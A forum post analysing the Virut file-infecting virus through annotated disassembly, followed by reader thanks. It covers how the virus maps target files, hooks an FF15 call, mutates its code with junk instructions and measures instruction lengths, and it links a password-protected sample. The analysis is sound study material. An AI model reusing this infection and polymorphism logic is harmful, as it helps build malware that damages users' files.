7FF82067    85C0            test eax,eax
7FF82069    74 06           je short 7FF82071
7FF8206B    FE85 07551B00   inc byte ptr ss:[ebp+0x1B5507]
7FF82071    6A 00           push 0x0
7FF82073    FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF82079    FF95 64501B00   call dword ptr ss:[ebp+0x1B5064]                    ; 获取文件大小
7FF8207F    83F8 FF         cmp eax,-0x1
7FF82082    0F84 1C130000   je 7FF833A4
7FF82088    8985 7E541B00   mov dword ptr ss:[ebp+0x1B547E],eax
7FF8208E    33C9            xor ecx,ecx
7FF82090    03C3            add eax,ebx
7FF82092    51              push ecx
7FF82093    50              push eax
7FF82094    51              push ecx
7FF82095    0BDB            or ebx,ebx
7FF82097    75 09           jnz short 7FF820A2
7FF82099    83BD 1C501B00 0>cmp dword ptr ss:[ebp+0x1B501C],0x0
7FF820A0    74 04           je short 7FF820A6
7FF820A2    6A 04           push 0x4
7FF820A4    EB 02           jmp short 7FF820A8
7FF820A6    6A 02           push 0x2
7FF820A8    51              push ecx
7FF820A9    FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF820AF    FF95 44501B00   call dword ptr ss:[ebp+0x1B5044]                    ; CreateFileMappingA
7FF820B5    85C0            test eax,eax
7FF820B7    0F84 E7120000   je 7FF833A4
7FF820BD    33C9            xor ecx,ecx
7FF820BF    8985 82541B00   mov dword ptr ss:[ebp+0x1B5482],eax
7FF820C5    51              push ecx
7FF820C6    51              push ecx
7FF820C7    51              push ecx
7FF820C8    85DB            test ebx,ebx
7FF820CA    0BDB            or ebx,ebx
7FF820CC    75 09           jnz short 7FF820D7


接下来再次建立映射。
接下来是个语句扫描标记的部分
[C++] 纯文本查看 复制代码
7FF828E2    66:8367 02 00   and word ptr ds:[edi+0x2],0x0
7FF828E7    6A 03           push 0x3                                            ; 语句数量
7FF828E9    58              pop eax
7FF828EA    66:8327 00      and word ptr ds:[edi],0x0                           ; 初始化
7FF828EE    66:C747 06 0080 mov word ptr ds:[edi+0x6],0x8000                    ; 初始话
7FF828F4    E8 2FE9FFFF     call 7FF81228
7FF828F9    8D4A 03         lea ecx,dword ptr ds:[edx+0x3]
7FF828FC    51              push ecx
7FF828FD    8D85 0A101B00   lea eax,dword ptr ss:[ebp+0x1B100A]
7FF82903    8D8D 4A101B00   lea ecx,dword ptr ss:[ebp+0x1B104A]
7FF82909    8D95 E0111B00   lea edx,dword ptr ss:[ebp+0x1B11E0]
7FF8290F    3BF0            cmp esi,eax                                         ; 比较是不是特殊区域
7FF82911    75 08           jnz short 7FF8291B
7FF82913    68 05000000     push 0x5
7FF82918    59              pop ecx
7FF82919    EB 37           jmp short 7FF82952
7FF8291B    3BF1            cmp esi,ecx                                         ; 特殊区域
7FF8291D    75 05           jnz short 7FF82924
7FF8291F    6A 02           push 0x2
7FF82921    59              pop ecx
7FF82922    EB 2E           jmp short 7FF82952
7FF82924    3BF2            cmp esi,edx
7FF82926    75 09           jnz short 7FF82931
7FF82928    6A 05           push 0x5
7FF8292A    C647 07 00      mov byte ptr ds:[edi+0x7],0x0
7FF8292E    59              pop ecx
7FF8292F    EB 21           jmp short 7FF82952
7FF82931    8A06            mov al,byte ptr ds:[esi]                            ; 获取opcode
7FF82933    3C E9           cmp al,0xE9                                         ; 长跳
7FF82935    74 0C           je short 7FF82943
7FF82937    3C EB           cmp al,0xEB                                         ; 短跳
7FF82939    74 08           je short 7FF82943
7FF8293B    3C C2           cmp al,0xC2                                         ; retn X
7FF8293D    74 04           je short 7FF82943
7FF8293F    3C C3           cmp al,0xC3                                         ; retn
7FF82941    75 06           jnz short 7FF82949
7FF82943    C647 07 80      mov byte ptr ds:[edi+0x7],0x80                      ; 标记
7FF82947    EB 04           jmp short 7FF8294D
7FF82949    C647 07 00      mov byte ptr ds:[edi+0x7],0x0
7FF8294D    E8 C2120000     call 7FF83C14                                       ; 反汇编长度引擎
7FF82952    66:010F         add word ptr ds:[edi],cx                            ; 总共的字节数
7FF82955    8D85 E8111B00   lea eax,dword ptr ss:[ebp+0x1B11E8]                 ; 获得结束区域
7FF8295B    03F1            add esi,ecx
7FF8295D    3BF0            cmp esi,eax
7FF8295F    59              pop ecx
7FF82960    73 2F           jnb short 7FF82991
7FF82962  ^ E2 98           loopd short 7FF828FC
7FF82964    FE85 23171B00   inc byte ptr ss:[ebp+0x1B1723]                      ; 总共的语句块
7FF8296A    80BD 23171B00 6>cmp byte ptr ss:[ebp+0x1B1723],0x63
7FF82971    77 13           ja short 7FF82986
7FF82973    66:8B47 02      mov ax,word ptr ds:[edi+0x2]                        ; 累计数量
7FF82977    66:0307         add ax,word ptr ds:[edi]                            ; 这次的数量
7FF8297A    83C7 08         add edi,0x8
7FF8297D    66:8947 02      mov word ptr ds:[edi+0x2],ax
7FF82981  ^ E9 61FFFFFF     jmp 7FF828E7
7FF82986    FE85 E8381B00   inc byte ptr ss:[ebp+0x1B38E8]
7FF8298C  ^ E9 37FFFFFF     jmp 7FF828C8


以三个汇编语句为一组记录。识别jmp,retn记录。
存入这样一个结构体中

virutcode struct
sumopcodesize dw ?
thiscodeszie  dw ?
jmpretflag    dw ?
unknow          dw ?
virutcode ends
st.jpg
[C++] 纯文本查看 复制代码
7FF82AA1    FF95 30501B00   call dword ptr ss:[ebp+0x1B5030]         ; 比较导入dll有没有kernel32.dll
7FF82AA7    85C0            test eax,eax
7FF82AA9    5A              pop edx
7FF82AAA    74 05           je short 7FF82AB1


[C++] 纯文本查看 复制代码
7FF82B04    03B5 86541B00   add esi,dword ptr ss:[ebp+0x1B5486]      ; 得到原始OEP处
7FF82B0A    FFB5 E6541B00   push dword ptr ss:[ebp+0x1B54E6]
7FF82B10    AC              lods byte ptr ds:[esi]
7FF82B11    3C E8           cmp al,0xE8                              ; 检测是不是跳转
7FF82B13    75 3F           jnz short 7FF82B54
7FF82B4F    8B40 02         mov eax,dword ptr ds:[eax+0x2]
7FF82B52    EB 28           jmp short 7FF82B7C
7FF82B54    3C FF           cmp al,0xFF                              ; 寻找ff
7FF82B56    75 0A           jnz short 7FF82B62
7FF82B58    803E 15         cmp byte ptr ds:[esi],0x15               ; 15
7FF82B5B    75 05           jnz short 7FF82B62


这里在找ff15,ff25什么的
做hook本实例是ff15
[C++] 纯文本查看 复制代码
7FF82BAD  ^\73 B3           jnb short 7FF82B62
7FF82BAF    8F85 E6541B00   pop dword ptr ss:[ebp+0x1B54E6]
7FF82BB5    FE85 10551B00   inc byte ptr ss:[ebp+0x1B5510]
7FF82BBB    814A 24 600000E>or dword ptr ds:[edx+0x24],0xE0000060    ; 设置节属性


接下来是变异引擎部分
[C#] 纯文本查看 复制代码
7FF82C47    50              push eax
7FF82C48    B0 02           mov al,0x2
7FF82C4A    E8 D9E5FFFF     call 7FF81228                            ; 产生随机数
7FF82C4F    0AD2            or dl,dl
7FF82C51    0F85 4C010000   jnz 7FF82DA3
7FF82C57    8BC6            mov eax,esi
7FF82C59    2BC5            sub eax,ebp                              ; 算出偏移
7FF82C5B    3D 0A101B00     cmp eax,0x1B100A                         ; 比较偏移
7FF82C60    75 0B           jnz short 7FF82C6D
7FF82C62    68 05000000     push 0x5
7FF82C67    59              pop ecx
7FF82C68    E9 25010000     jmp 7FF82D92
7FF82C6D    3D 4A101B00     cmp eax,0x1B104A                         ; 比较偏移
7FF82C72    75 08           jnz short 7FF82C7C
7FF82C74    6A 02           push 0x2
7FF82C76    59              pop ecx
7FF82C77    E9 16010000     jmp 7FF82D92
7FF82C7C    3D E0111B00     cmp eax,0x1B11E0                         ; 比较偏移这些应该是特殊部分
7FF82C81    75 08           jnz short 7FF82C8B
7FF82C83    6A 05           push 0x5
7FF82C85    59              pop ecx
7FF82C86    E9 07010000     jmp 7FF82D92
7FF82C8B    80BD 10551B00 F>cmp byte ptr ss:[ebp+0x1B5510],0xFF
7FF82C92    74 6C           je short 7FF82D00                        ; 比较偏移这些应该是特殊部分
7FF82C94    3D DB101B00     cmp eax,0x1B10DB
7FF82C99    72 65           jb short 7FF82D00                        ; 比较偏移这些应该是特殊部分
7FF82C9B    3D E3101B00     cmp eax,0x1B10E3
7FF82CA0    73 5E           jnb short 7FF82D00                       ; 比较偏移这些应该是特殊部分
7FF82CA2    807E 01 5C      cmp byte ptr ds:[esi+0x1],0x5C
7FF82CA6    75 58           jnz short 7FF82D00
7FF82CA8    AD              lods dword ptr ds:[esi]
7FF82CA9    8BD7            mov edx,edi
7FF82CAB    8985 281B1B00   mov dword ptr ss:[ebp+0x1B1B28],eax
7FF82CB1    AA              stos byte ptr es:[edi]
7FF82CB2    B0 1D           mov al,0x1D
7FF82CB4    2B95 CE541B00   sub edx,dword ptr ss:[ebp+0x1B54CE]
7FF82CBA    AA              stos byte ptr es:[edi]
7FF82CBB    6A 04           push 0x4
7FF82CBD    8B85 02551B00   mov eax,dword ptr ss:[ebp+0x1B5502]
7FF82CC3    3B95 201B1B00   cmp edx,dword ptr ss:[ebp+0x1B1B20]
7FF82CC9    76 06           jbe short 7FF82CD1
7FF82CCB    81EA 343D0000   sub edx,0x3D34
7FF82CD1    59              pop ecx
7FF82CD2    AB              stos dword ptr es:[edi]
7FF82CD3    8995 241B1B00   mov dword ptr ss:[ebp+0x1B1B24],edx
7FF82CD9    0FB395 441A1B00 btr dword ptr ss:[ebp+0x1B1A44],edx
7FF82CE0    42              inc edx
7FF82CE1  ^ E2 F6           loopd short 7FF82CD9
7FF82CE3    8B0424          mov eax,dword ptr ss:[esp]
7FF82CE6    66:8384C5 2A171>add word ptr ss:[ebp+eax*8+0x1B172A],0x4
7FF82CEF    836C24 04 04    sub dword ptr ss:[esp+0x4],0x4
7FF82CF4    B1 02           mov cl,0x2
7FF82CF6    E9 BA000000     jmp 7FF82DB5
7FF82CFB    E9 92000000     jmp 7FF82D92
7FF82D00    3D 73111B00     cmp eax,0x1B1173
7FF82D05    0F85 82000000   jnz 7FF82D8D
7FF82D0B    80BD 10551B00 0>cmp byte ptr ss:[ebp+0x1B5510],0x0
7FF82D12    72 79           jb short 7FF82D8D
7FF82D14    80BD 10551B00 0>cmp byte ptr ss:[ebp+0x1B5510],0x2
7FF82D1B    73 70           jnb short 7FF82D8D
7FF82D1D    80BD 10551B00 0>cmp byte ptr ss:[ebp+0x1B5510],0x0
7FF82D24    75 06           jnz short 7FF82D2C
7FF82D26    89BD 12551B00   mov dword ptr ss:[ebp+0x1B5512],edi
7FF82D2C    0FB685 11551B00 movzx eax,byte ptr ss:[ebp+0x1B5511]
7FF82D33    6A 07           push 0x7
7FF82D35    6BC0 03         imul eax,eax,0x3
7FF82D38    59              pop ecx
7FF82D39    8B95 FE541B00   mov edx,dword ptr ss:[ebp+0x1B54FE]
7FF82D3F    80BD 10551B00 0>cmp byte ptr ss:[ebp+0x1B5510],0x1
7FF82D46    75 05           jnz short 7FF82D4D
7FF82D48    83C2 04         add edx,0x4
7FF82D4B    2BD0            sub edx,eax
7FF82D4D    03C8            add ecx,eax
7FF82D4F    B0 C6           mov al,0xC6
7FF82D51    0285 11551B00   add al,byte ptr ss:[ebp+0x1B5511]
7FF82D57    AA              stos byte ptr es:[edi]
7FF82D58    B0 05           mov al,0x5
7FF82D5A    AA              stos byte ptr es:[edi]
7FF82D5B    8BC2            mov eax,edx
7FF82D5D    0343 34         add eax,dword ptr ds:[ebx+0x34]
7FF82D60    AB              stos dword ptr es:[edi]
7FF82D61    0395 E6541B00   add edx,dword ptr ss:[ebp+0x1B54E6]
7FF82D67    0395 86541B00   add edx,dword ptr ss:[ebp+0x1B5486]
7FF82D6D    8B02            mov eax,dword ptr ds:[edx]
7FF82D6F    80BD 11551B00 0>cmp byte ptr ss:[ebp+0x1B5511],0x0
7FF82D76    75 03           jnz short 7FF82D7B
7FF82D78    AA              stos byte ptr es:[edi]
7FF82D79    EB 01           jmp short 7FF82D7C
7FF82D7B    AB              stos dword ptr es:[edi]
7FF82D7C    FE85 10551B00   inc byte ptr ss:[ebp+0x1B5510]
7FF82D82    80B5 11551B00 0>xor byte ptr ss:[ebp+0x1B5511],0x1
7FF82D89    EB 2A           jmp short 7FF82DB5
7FF82D8B    EB 05           jmp short 7FF82D92
7FF82D8D    E8 820E0000     call 7FF83C14                            ; 反汇编长度引擎
7FF82D92    C685 E13D1B00 B>mov byte ptr ss:[ebp+0x1B3DE1],0xB3
7FF82D99    51              push ecx
7FF82D9A    294C24 08       sub dword ptr ss:[esp+0x8],ecx
7FF82D9E    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[>; 传输代码
7FF82DA0    59              pop ecx
7FF82DA1    EB 19           jmp short 7FF82DBC
7FF82DA3    57              push edi
7FF82DA4    F71C24          neg dword ptr ss:[esp]
7FF82DA7    E8 4AF4FFFF     call 7FF821F6                            ; 一个ETG引擎随机产生垃圾指令
7FF82DAC    59              pop ecx                                  ; 并且放到感染文件中
7FF82DAD    03CF            add ecx,edi
7FF82DAF    298D D2541B00   sub dword ptr ss:[ebp+0x1B54D2],ecx
7FF82DB5    C685 E13D1B00 A>mov byte ptr ss:[ebp+0x1B3DE1],0xAB
7FF82DBC    8B0424          mov eax,dword ptr ss:[esp]
7FF82DBF    66:018CC5 2A171>add word ptr ss:[ebp+eax*8+0x1B172A],cx
7FF82DC7    8D57 FF         lea edx,dword ptr ds:[edi-0x1]
7FF82DCA    E3 1E           jecxz short 7FF82DEA
7FF82DCC    2B95 CE541B00   sub edx,dword ptr ss:[ebp+0x1B54CE]
7FF82DD2    3B95 201B1B00   cmp edx,dword ptr ss:[ebp+0x1B1B20]
7FF82DD8    76 06           jbe short 7FF82DE0
7FF82DDA    81EA 343D0000   sub edx,0x3D34
7FF82DE0    0FB395 441A1B00 btr dword ptr ss:[ebp+0x1B1A44],edx
7FF82DE7    4A              dec edx
7FF82DE8  ^ E2 F6           loopd short 7FF82DE0


根据随机数0,1判断是否添加垃圾指令。然后挪动代码
后面有一堆代码应该是用来修正重定位和处理代码的。水平有限,看的有点吃力。
感觉要花我大量的时间。。所以这里没有分析
[C++] 纯文本查看 复制代码
7FF832FD    03BD E6541B00   add edi,dword ptr ss:[ebp+0x1B54E6]
7FF83303    B0 E9           mov al,0xE9
7FF83305    AA              stos byte ptr es:[edi]                   ; 到刚才找到ff15处
7FF83306    8D42 FB         lea eax,dword ptr ds:[edx-0x5]
7FF83309    2B85 FE541B00   sub eax,dword ptr ss:[ebp+0x1B54FE]
7FF8330F    AB              stos dword ptr es:[edi]                  ; 跳到病毒代码的开始
7FF83310    83BD 1A551B00 0>cmp dword ptr ss:[ebp+0x1B551A],0x0


[C++] 纯文本查看 复制代码
7FF83361   /0F84 9D000000   je 7FF83404
7FF83367   |FFB5 86541B00   push dword ptr ss:[ebp+0x1B5486]
7FF8336D   |FF95 C4501B00   call dword ptr ss:[ebp+0x1B50C4]         ; UnmapViewOfFile
7FF83373   |FFB5 82541B00   push dword ptr ss:[ebp+0x1B5482]
7FF83379   |FF95 04501B00   call dword ptr ss:[ebp+0x1B5004]         ; CloseHandle
7FF8337F   |80BD 07551B00 0>cmp byte ptr ss:[ebp+0x1B5507],0x0
7FF83386   |74 1C           je short 7FF833A4
7FF83388   |8D8D 6E541B00   lea ecx,dword ptr ss:[ebp+0x1B546E]
7FF8338E   |8D95 76541B00   lea edx,dword ptr ss:[ebp+0x1B5476]
7FF83394   |51              push ecx
7FF83395   |52              push edx
7FF83396   |6A 00           push 0x0
7FF83398   |FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF8339E   |FF95 B8501B00   call dword ptr ss:[ebp+0x1B50B8]         ; SetFileTime
7FF833A4   |80BD FC551B00 0>cmp byte ptr ss:[ebp+0x1B55FC],0x0
7FF833AB   |74 2F           je short 7FF833DC
7FF833AD   |8B85 7E541B00   mov eax,dword ptr ss:[ebp+0x1B547E]
7FF833B3   |6A 00           push 0x0
7FF833B5   |0385 8A541B00   add eax,dword ptr ss:[ebp+0x1B548A]
7FF833BB   |0385 8E541B00   add eax,dword ptr ss:[ebp+0x1B548E]
7FF833C1   |6A 00           push 0x0
7FF833C3   |50              push eax
7FF833C4   |FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF833CA   |FF95 B4501B00   call dword ptr ss:[ebp+0x1B50B4]
7FF833D0   |FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF833D6   |FF95 AC501B00   call dword ptr ss:[ebp+0x1B50AC]         ; SetEndOfFIle
7FF833DC   |FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF833E2   |FF95 04501B00   call dword ptr ss:[ebp+0x1B5004]         ; CloseHandle
7FF833E8   |80BD 06551B00 0>cmp byte ptr ss:[ebp+0x1B5506],0x0
7FF833EF   |74 13           je short 7FF83404
7FF833F1   |8DB5 62531B00   lea esi,dword ptr ss:[ebp+0x1B5362]
7FF833F7   |FFB5 66541B00   push dword ptr ss:[ebp+0x1B5466]
7FF833FD   |56              push esi
7FF833FE   |FF95 B0501B00   call dword ptr ss:[ebp+0x1B50B0]         ; SetFileAttributestA
7FF83404   \66:83A5 06551B0>and word ptr ss:[ebp+0x1B5506],0x0
7FF8340C    83A5 6A541B00 0>and dword ptr ss:[ebp+0x1B546A],0x0
7FF83413    C3              retn


这里是最后收尾感染结束
[C++] 纯文本查看 复制代码
7C92D095    BA 0003FE7F     mov edx,0x7FFE0300
7C92D09A    FF12            call dword ptr ds:[edx]

返回到被hook代码之下
感染过程结束。
感染之后的样子
3.jpg
感染之前
4.jpg
[C++] 纯文本查看 复制代码
4AD74A29    C605 5550D04A F>mov byte ptr ds:[0x4AD05055],0xFF
4AD74A30    C705 5650D04A 1>mov dword ptr ds:[0x4AD05056],0xD0101C15
4AD74A3A    90              nop


exe最后修复被偷的代码返回
x1.jpg

结束。
这里附上病毒的反汇编长度引擎的简要分析。
[C++] 纯文本查看 复制代码
7FF83C14    56              push esi
7FF83C15    33C9            xor ecx,ecx
7FF83C17    C685 08551B00 0>mov byte ptr ss:[ebp+0x1B5508],0x1                        ;设置为32位模式
7FF83C1E    C685 09551B00 0>mov byte ptr ss:[ebp+0x1B5509],0x1                        ;设置为32位模式
7FF83C25    33C0            xor eax,eax
7FF83C27    AC              lods byte ptr ds:[esi]
7FF83C28    8B8485 14441B00 mov eax,dword ptr ss:[ebp+eax*4+0x1B4414]                ;查表,可以知道指令信息为dword类型
7FF83C2F    A9 10000000     test eax,0x10                                        ;两字节opcode形式
7FF83C34    74 0B           je short 7FF83C41
7FF83C36    41              inc ecx                                                ;修正opcode
7FF83C37    33C0            xor eax,eax
7FF83C39    AC              lods byte ptr ds:[esi]                                ;再次获取
7FF83C3A    8B8485 14481B00 mov eax,dword ptr ss:[ebp+eax*4+0x1B4814]                ;再次查第二张表
7FF83C41    A9 00001000     test eax,0x100000
7FF83C46    74 06           je short 7FF83C4E
7FF83C48    41              inc ecx
7FF83C49    0D 00010000     or eax,0x100
7FF83C4E    A9 04000000     test eax,0x4
7FF83C53    74 07           je short 7FF83C5C
7FF83C55    80B5 08551B00 0>xor byte ptr ss:[ebp+0x1B5508],0x1                        ;16/32操作数方式标志转换prefix 66h
7FF83C5C    A9 08000000     test eax,0x8
7FF83C61    74 07           je short 7FF83C6A
7FF83C63    80B5 09551B00 0>xor byte ptr ss:[ebp+0x1B5509],0x1                   ; 16/32寻址方式标志转换prefix 67h
7FF83C6A    A9 02000000     test eax,0x2                                        ;普通前缀
7FF83C6F    74 03           je short 7FF83C74
7FF83C71    41              inc ecx                                                ;修正长度后
7FF83C72  ^ EB B1           jmp short 7FF83C25                                        ;继续获取opcode
7FF83C74    A9 21000000     test eax,0x21
7FF83C79    74 01           je short 7FF83C7C
7FF83C7B    41              inc ecx
7FF83C7C    A9 20000000     test eax,0x20
7FF83C81    74 01           je short 7FF83C84
7FF83C83    41              inc ecx
7FF83C84    A9 00600000     test eax,0x6000
7FF83C89    74 11           je short 7FF83C9C
7FF83C8B    80BD 08551B00 0>cmp byte ptr ss:[ebp+0x1B5508],0x0
7FF83C92    75 05           jnz short 7FF83C99
7FF83C94    83C1 04         add ecx,0x4
7FF83C97    EB 03           jmp short 7FF83C9C
7FF83C99    83C1 06         add ecx,0x6
7FF83C9C    A9 80000000     test eax,0x80
7FF83CA1    74 0F           je short 7FF83CB2
7FF83CA3    80BD 09551B00 0>cmp byte ptr ss:[ebp+0x1B5509],0x1
7FF83CAA    75 03           jnz short 7FF83CAF
7FF83CAC    83C1 02         add ecx,0x2
7FF83CAF    83C1 02         add ecx,0x2
7FF83CB2    A9 40000000     test eax,0x40                                        ;跳转模式
7FF83CB7    74 0F           je short 7FF83CC8
7FF83CB9    80BD 08551B00 0>cmp byte ptr ss:[ebp+0x1B5508],0x1                        ;确认模式
7FF83CC0    75 03           jnz short 7FF83CC5
7FF83CC2    83C1 02         add ecx,0x2                                        
7FF83CC5    83C1 02         add ecx,0x2                                                ;修正长度
7FF83CC8    A9 00000800     test eax,0x80000
7FF83CCD    74 19           je short 7FF83CE8
7FF83CCF    50              push eax
7FF83CD0    AC              lods byte ptr ds:[esi]
7FF83CD1    3C F8           cmp al,0xF8
7FF83CD3    74 08           je short 7FF83CDD
7FF83CD5    3C E8           cmp al,0xE8
7FF83CD7    74 04           je short 7FF83CDD
7FF83CD9    3C 70           cmp al,0x70
7FF83CDB    75 03           jnz short 7FF83CE0
7FF83CDD    41              inc ecx
7FF83CDE    EB 07           jmp short 7FF83CE7
7FF83CE0    810C24 00010000 or dword ptr ss:[esp],0x100
7FF83CE7    58              pop eax
7FF83CE8    A9 00800000     test eax,0x8000
7FF83CED    74 1B           je short 7FF83D0A
7FF83CEF    8A16            mov dl,byte ptr ds:[esi]
7FF83CF1    80E2 38         and dl,0x38
7FF83CF4    75 0A           jnz short 7FF83D00
7FF83CF6    B8 01010000     mov eax,0x101
7FF83CFB  ^ E9 2FFFFFFF     jmp 7FF83C2F
7FF83D00    B8 00010000     mov eax,0x100
7FF83D05  ^ E9 25FFFFFF     jmp 7FF83C2F
7FF83D0A    A9 00000100     test eax,0x10000
7FF83D0F    74 1B           je short 7FF83D2C
7FF83D11    8A16            mov dl,byte ptr ds:[esi]
7FF83D13    80E2 38         and dl,0x38
7FF83D16    75 0A           jnz short 7FF83D22
7FF83D18    B8 40010000     mov eax,0x140
7FF83D1D  ^ E9 0DFFFFFF     jmp 7FF83C2F
7FF83D22    B8 00010000     mov eax,0x100
7FF83D27  ^ E9 03FFFFFF     jmp 7FF83C2F
7FF83D2C    A9 00000200     test eax,0x20000
7FF83D31    74 0A           je short 7FF83D3D
7FF83D33    B8 00010000     mov eax,0x100
7FF83D38  ^ E9 F2FEFFFF     jmp 7FF83C2F
7FF83D3D    A9 00010000     test eax,0x100                                        ;检测是不是有mod部分
7FF83D42    74 6E           je short 7FF83DB2
7FF83D44    AC              lods byte ptr ds:[esi]
7FF83D45    41              inc ecx
7FF83D46    8AD0            mov dl,al                                            ; 保存一份
7FF83D48    24 C0           and al,0xC0                                          ; 解析 mod
7FF83D4A    80E2 07         and dl,0x7
7FF83D4D    C0E8 06         shr al,0x6                                           ; 在al处获得mod
7FF83D50    3C 03           cmp al,0x3                                           ; 看mod方式3为不使用sib
7FF83D52    74 5E           je short 7FF83DB2
7FF83D54    80BD 09551B00 0>cmp byte ptr ss:[ebp+0x1B5509],0x0
7FF83D5B    75 1E           jnz short 7FF83D7B
7FF83D5D    0AC0            or al,al
7FF83D5F    75 0A           jnz short 7FF83D6B
7FF83D61    80FA 06         cmp dl,0x6
7FF83D64    75 05           jnz short 7FF83D6B
7FF83D66    83C1 02         add ecx,0x2
7FF83D69    EB 47           jmp short 7FF83DB2
7FF83D6B    3C 01           cmp al,0x1
7FF83D6D    75 03           jnz short 7FF83D72
7FF83D6F    41              inc ecx
7FF83D70    EB 40           jmp short 7FF83DB2
7FF83D72    3C 02           cmp al,0x2
7FF83D74    75 3C           jnz short 7FF83DB2
7FF83D76    83C1 02         add ecx,0x2
7FF83D79    EB 37           jmp short 7FF83DB2
7FF83D7B    80FA 04         cmp dl,0x4                                           ; 解析的r/m部分 4为结合sib
7FF83D7E    75 16           jnz short 7FF83D96
7FF83D80    3C 03           cmp al,0x3
7FF83D82    74 12           je short 7FF83D96
7FF83D84    41              inc ecx                                              ; 修正长度
7FF83D85    0AC0            or al,al
7FF83D87    75 0D           jnz short 7FF83D96
7FF83D89    8A06            mov al,byte ptr ds:[esi]                             ; 获取sib
7FF83D8B    24 07           and al,0x7                                           ; 获得Base
7FF83D8D    3C 05           cmp al,0x5                                           ; 检测是不是5,5的话用立即数做base
7FF83D8F    75 03           jnz short 7FF83D94
7FF83D91    83C1 04         add ecx,0x4                                          ; 修正长度
7FF83D94    B0 00           mov al,0x0
7FF83D96    0AC0            or al,al                                             ; 寄存起直接寻址
7FF83D98    75 0A           jnz short 7FF83DA4
7FF83D9A    80FA 05         cmp dl,0x5
7FF83D9D    75 05           jnz short 7FF83DA4
7FF83D9F    83C1 04         add ecx,0x4
7FF83DA2    EB 0E           jmp short 7FF83DB2
7FF83DA4    3C 01           cmp al,0x1                                           ; 寄存器加8位偏移
7FF83DA6    75 03           jnz short 7FF83DAB
7FF83DA8    41              inc ecx
7FF83DA9    EB 07           jmp short 7FF83DB2
7FF83DAB    3C 02           cmp al,0x2                                           ; 寄存起加32位偏移
7FF83DAD    75 03           jnz short 7FF83DB2
7FF83DAF    83C1 04         add ecx,0x4
7FF83DB2    41              inc ecx
7FF83DB3    5E              pop esi
7FF83DB4    C3              retn


1.rar (34.39 KB, 下载次数: 52) 密码为52pojie
病毒实现多态变形,反汇编长度引擎是个保障,少不了的,写这种引擎最主要的的是建立表。
就是说,把指令归类,具有相同类型的指令编为一个码,然后就能用共同的算法进行解析。
有了长度引擎之后就能识别出指令的长度。做各种变形了。


免费评分

参与人数 11热心值 +11 收起 理由
浅呼吸lin + 1 谢谢@Thanks!
Mr.Mlwareson_V + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
涉猎 + 1 我很赞同!
谎言 + 1 我很赞同!
小范 + 1 我很赞同!
冒死一搏 + 1 感谢分享!!!!!!!!!!!!!!!!.
fire8223069 + 1 谢谢@Thanks!
LShang + 1 我很赞同!
JoyChou + 1 膜拜兰斯。
Peace + 1 我很赞同!
吾爱靓仔 + 1 前排支持L4大大o(∩_∩)o ~~~

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

senwar 发表于 2014-3-5 14:08
我想要实现如下要求:
1.监控自己电脑里面所有软件访问的IP 或者网站地址,端口,
2.比如说打开了PPTV,然后就能看到它请求的地址或者端口,
3.什么软件能实现呢?
4.主要就是抓包了来屏蔽网络各种P2P软件,免得大家上网慢。
5.限速不行,需要直接屏蔽地址,谢谢!
头像被屏蔽
cg少年 发表于 2014-2-26 11:29
hzg303 发表于 2014-2-26 11:33
JoyChou 发表于 2014-2-26 19:32
兰斯,求带。
封心锁爱 发表于 2014-2-28 09:52
功力不够,看着费劲啊...
头像被屏蔽
binlov 发表于 2014-3-1 21:14
谢谢分享了
fire8223069 发表于 2014-3-1 22:11
谢谢楼主无尽分享!
冒死一搏 发表于 2014-3-1 23:34
不错,我一点都没看懂
涉猎 发表于 2014-3-2 09:33
感谢分享,很不错
小黑and小白 发表于 2014-3-2 10:14
趕腳很不錯的樣紙,可是一點沒看懂。。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 13:48

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表